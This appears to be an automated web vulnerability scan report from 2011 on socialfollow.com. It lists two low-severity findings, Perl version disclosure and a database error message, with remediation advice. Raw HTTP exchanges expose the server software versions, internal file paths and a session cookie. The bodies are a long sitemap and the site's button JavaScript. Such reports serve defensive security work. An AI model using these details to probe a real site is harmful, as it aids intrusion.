<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/07/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/06/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/04/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/03/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/future-features/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/analytics/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/blogger-institute/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/fine-art-of-blogging/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/follow-me-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/go2web20net/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/interview/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/killerstartupscom/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/multiple-languages/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/rafferty-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/raffy-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/reputation-management/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networking-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networks/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/studio98/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter-feed/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/visionwiz/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-us/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/ziipa/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-almost-launched/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-button-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/social-follow-joins-twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/banner/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barandide/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barneykavai/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barry-shereshevsky/</loc>
<changefreq>monthly</changefreq>
<pr..
Perl Version Disclosure

Perl Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the Perl version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version of Perl. Also the attacker can use this information in conjunction with other identified vulnerabilities in the application or the web server.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /sitemap.xml

/sitemap.xml

http://www.socialfollow.com/sitemap.xml

Extracted Version

Perl/v5.8.

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:42:18 GMT
ETag: "19abdf-e460-4895681664a80"
Accept-Ranges: bytes
Content-Length: 58464
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->

<url>
<loc>http://www.socialfollow.com/</loc>
<changefreq>monthly</changefreq>
<priority>1.00</priority>
</url>
<url>
<loc>http://www.socialfollow.com/forgot-password.php</loc>
<changefreq>monthly</changefreq>
<priority>0.50</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/terms-and-conditions.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/privacy-policy.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/contact-us.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/sitemap.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/movingpartsaudio/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/frozenrodeo/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/theannandalecardinals/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/heartofthelakesrecords/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-special-touch/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-vintage-revolution/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/aarontimlin/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhi/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhishek/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/academy-of-life-and-leadership/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/achraf52/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/acquaspa/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adam-haider/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adamlinsley/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/login.php</loc>
<changefreq>monthly</changefreq>
<priority>0.85</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/wordpress-plugin-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/kerry-jones/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-feature/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/plugin/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/wordpress/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/server-upgrade-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-release/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/page/2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/08/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/07/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/06/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/04/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/03/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/future-features/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/analytics/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/blogger-institute/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/fine-art-of-blogging/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/follow-me-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/go2web20net/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/interview/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/killerstartupscom/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/multiple-languages/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/rafferty-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/raffy-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/reputation-management/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networking-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networks/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/studio98/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter-feed/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/visionwiz/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-us/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/ziipa/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-almost-launched/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-button-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/social-follow-joins-twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/banner/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barandide/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barneykavai/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barry-shereshevsky/</loc>
<changefreq>monthly</changefreq>
<pr..
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /button/

/button/

http://www.socialfollow.com/button/

Request

GET /button/ HTTP/1.1
Referer: http://www.socialfollow.com/button/image/?b=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:31 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Keep-Alive: timeout=2, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/javascript


<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/><br/><b>Warning</b>:Cannot modify header information-headers already sent by(output started at/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php:6)in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>19</b><br/>var menu={divclass:'sociallinks',inlinestyle:'visibility:hidden',linktarget:'secwin'};menu.cols={divclass:'column',inlinestyle:''};menu.items=[];var socialfollow={init:function(targetclass){socialfollow.init(targetclass);}}var socialfollow={menusmap:{},effects:{delayhide:200,shadow:{enabled:true,opacity:0.3,depth:[5,5]},fade:{enabled:false,duration:500}},dimensions:{},getoffset:function(what,offsettype){return(what.offsetParent)?what[offsettype]+this.getoffset(what.offsetParent,offsettype):what[offsettype]},getoffsetof:function(el){el._offsets={left:this.getoffset(el,"offsetLeft"),top:this.getoffset(el,"offsetTop"),h:el.offsetHeight}},getdimensions:function(menu){this.dimensions={anchorw:menu.anchorobj.offsetWidth,anchorh:menu.anchorobj.offsetHeight,docwidth:(window.innerWidth||this.standardbody.clientWidth)-20,docheight:(window.innerHeight||this.standardbody.clientHeight)-15,docscrollx:window.pageXOffset||this.standardbody.scrollLeft,docscrolly:window.pageYOffset||this.standardbody.scrollTop}if(!this.dimensions.dropmenuw){this.dimensions.dropmenuw=menu.dropmenu.offsetWidth;this.dimensions.dropmenuh=menu.dropmenu.offsetHeight;}},isContained:function(m,e){var e=window.event||e;var c=e.relatedTarget||((e.type=="mouseover")?e.fromElement:e.toElement)while(c&&c!=m)try{c=c.parentNode}catch(e){c=m}return(c==m)?true:false;},setopacity:function(el,value){el.style.opacity=value;if(typeof el.style.opacity!="string"){el.style.MozOpacity=value;if(el.filters)el.style.filter="progid:DXImageTransform.Microsoft.alpha(opacity="+value*100+")"}},showmenu:function(menuid){var menu=socialfollow.menusmap[menuid];clearTimeout(menu.hidetimer);this.getoffsetof(menu.anchorobj);this.getdimensions(menu);var posx=menu.anchorobj._offsets.left+(menu.orientation=="lr"?this.dimensions.anchorw:0);var posy=menu.anchorobj._offsets.top+this.dimensions.anchorh-(menu.orientation=="lr"?this.dimensions.anchorh:0)if(posx+this.dimensions.dropmenuw+this.effects.shadow.depth[0]>this.dimensions.docscrollx+this.dimensions.docwidth){posx=posx-this.dimensions.dropmenuw+(menu.orientation=="lr"?-this.dimensions.anchorw:this.dimensions.anchorw);}if(posy+this.dimensions.dropmenuh>this.dimensions.docscrolly+this.dimensions.docheight){posy=Math.max(posy-this.dimensions.dropmenuh-(menu.orientation=="lr"?-this.dimensions.anchorh:this.dimensions.anchorh),this.dimensions.docscrolly);}if(this.effects.fade.enabled){this.setopacity(menu.dropmenu,0);if(this.effects.shadow.enabled)this.setopacity(menu.shadow,0);}menu.dropmenu.setcss({left:posx+'px',top:posy+'px',visibility:'visible'});if(this.effects.shadow.enabled){menu.shadow.setcss({left:posx+socialfollow.effects.shadow.depth[0]+'px',top:posy+socialfollow.effects.shadow.depth[1]+'px',visibility:'visible'});}if(this.effects.fade.enabled){clearInterval(menu.animatetimer);menu.curanimatedegree=0;menu.starttime=new Date().getTime();menu.animatetimer=setInterval(function(){socialfollow.revealmenu(menuid)},20);}},revealmenu:function(menuid){var menu=socialfollow.menusmap[menuid];var elapsed=new Date().getTime()-menu.starttime;if(elapsed<this.effects.fade.duration){this.setopacity(menu.dropmenu,menu.curanimatedegree);if(this.effects.shadow.enabled)this.setopacity(menu.shadow,menu.curanimatedegree*this.effects.shadow.opacity);}else{clearInterval(menu.animatetimer);this.setopacity(menu.dropmenu,1);menu.dropmenu.style.filter="";}menu.curanimatedegree=(1-Math.cos((elapsed/this.effects.fade.duration)*Math.PI))/2;},setcss:function(param){for(prop in param){this.style[prop]=param[prop];}},hidemenu:function(menuid){var menu=socialfollow.menusmap[menuid];clearInterval(menu.animatetimer);menu.dropmenu.setcss({visibility:'hidden',left:0,top:0});menu.shadow.setcss({visibility:'hidden',left:0,top:0});},getElementsByClass:function(targetclass){if(document.querySelectorAll){return document.querySelectorAll("."+targetclass);}else{var classnameRE=new RegExp("(^|\\s+)"+targetclass+"($|\\s+)","i");var pieces=[];var alltags=document.all?document.all:document.getElementsByTagName("*");for(var i=0;i<alltags.length;i++){if(typeof alltags[i].className=="string"&&alltags[i].className.search(classnameRE)!=-1)pieces[pieces.length]=alltags[i];}return pieces;}},addDiv:function(divid,divclass,inlinestyle){var el=document.createElement("div");if(divid)el.id=divid;el.className=divclass;el.style.cssText=inlinestyle;document.body.insertBefore(el,document.body.firstChild);return el;},getmenuHTML:function(menuobj){var menucontent=[];var frag="";for(var i=0;i<menuobj.items.length;i++){if(menuobj.items[i][0]=="All Social Sites..."){frag+='<li><a href="javascript:popUp(400,100,600,300,1);" class="allSites">'+menuobj.items[i][0]+'</a></li>\n';menucontent.push(frag);frag="";}else{var socialSite=menuobj.items[i][0];var socialSiteID=menuobj.items[i][1];var socialSiteLink=menuobj.items[i][2];frag+='<li><a class="c'+socialSiteID+'" href="http://www.socialfollow.com/button/link?b=&amp;r='+document.referrer+'&amp;s='+socialSiteID+'&amp;l='+socialSiteLink+'" target="'+menuobj.linktarget+'">'+socialSite+'</a></li>\n';if(menuobj.items[i][3]=="efc"||i==menuobj.items.length-1){menucontent.push(frag);frag="";}}}if(typeof menuobj.cols=="undefined"){return'<ul>\n'+menucontent.join('')+'\n</ul>';}else{frag="<div class='show' style='padding: 0 3px;display:none'>";for(var i=0;i<menucontent.length;i++){frag+='<div class="'+menuobj.cols.divclass+'" style="'+menuobj.cols.inlinestyle+'">\n<ul>\n'+menucontent[i]+'</ul>\n</div>\n';}frag+="</div>";frag+='<div class="paddingSmall show" style="display:none"><div class="socialFollowLink"><a href="http://www.socialfollow.com/" target="_blank"><img src="http://www.socialfollow.com/button/image-link/?b=&amp;r='+document.referrer+'" border="0" alt="Get your own Social Follow button!" /></a></div></div>';frag+='<div class="bottomBorder show" style="display:none">&nbsp;</div>';return frag;}},addEvent:function(targetarr,functionref,tasktype){if(targetarr.length>0){var target=targetarr.shift()if(target.addEventListener){target.addEventListener(tasktype,functionref,false);}else if(target.attachEvent){target.attachEvent('on'+tasktype,function(){return functionref.call(target,window.event)});}this.addEvent(targetarr,functionref,tasktype);}},setupmenu:function(targetclass,anchorobj,pos){this.standardbody=(document.compatMode=="CSS1Compat")?document.documentElement:document.body;var relattr='menu';dropmenuid='menu';var dropmenuvar=window[dropmenuid];var dropmenu=this.addDiv(null,dropmenuvar.divclass,dropmenuvar.inlinestyle);dropmenu.innerHTML=this.getmenuHTML(dropmenuvar);var menu=this.menusmap[targetclass+pos]={id:targetclass+pos,anchorobj:anchorobj,dropmenu:dropmenu,revealtype:(relattr.length!=dropmenuid.length&&RegExp.$1=="click")?"click":"mouseover",orientation:anchorobj.getAttribute("rev")=="lr"?"lr":"ud",shadow:this.addDiv(null,"anylinkshadow",null)}menu.anchorobj._internalID=targetclass+pos;menu.anchorobj._isanchor=true;menu.dropmenu._internalID=targetclass+pos;menu.shadow._internalID=targetclass+pos;menu.dropmenu.setcss=this.setcss;menu.shadow.style.display="none";menu.shadow.setcss=this.setcss;menu.shadow.setcss({display:"block"});this.setopacity(menu.shadow,this.effects.shadow.opacity);this.addEvent([menu.anchorobj,menu.dropmenu,menu.shadow],function(e){var menu=socialfollow.menusmap[this._internalID];if(this._isanchor&&menu.revealtype=="mouseover"&&!socialfollow.isContained(this,e)){socialfollow.showmenu(menu.id);}else if(typeof this._isanchor=="undefined"){clearTimeout(menu.hidetimer);}},"mouseover");this.addEvent([menu.anchorobj,menu.dropmenu,menu.shadow],function(e){if(!socialfollow.isContained(this,e)){var menu=socialfollow.menusmap[this._internalID];menu.hidetimer=setTimeout(function(){socialfollow.hidemenu(menu.id)},socialfollow.effects.delayhide);}},"mouseout");this.addEvent([menu.anchorobj,menu.dropmenu],function(e){var menu=socialfollow.menusmap[this._internalID];if(this._isanchor&&menu.revealtype=="click"){if(menu.dropmenu.style.visibility=="visible"){socialfollow.hidemenu(menu.id);}else{socialfollow.showmenu(menu.id);}if(e.preventDefault){e.preventDefault();}return false}else{menu.hidetimer=setTimeout(function(){socialfollow.hidemenu(menu.id)},socialfollow.effects.delayhide);}},"click");},init:function(targetclass){var headID=document.getElementsByTagName("head")[0];var cssNode=document.createElement('link');cssNode.type='text/css';cssNode.rel='stylesheet';cssNode.href='http://www.socialfollow.com/button/css/?b=&n=&socialSites=';cssNode.media='screen';headID.appendChild(cssNode);var 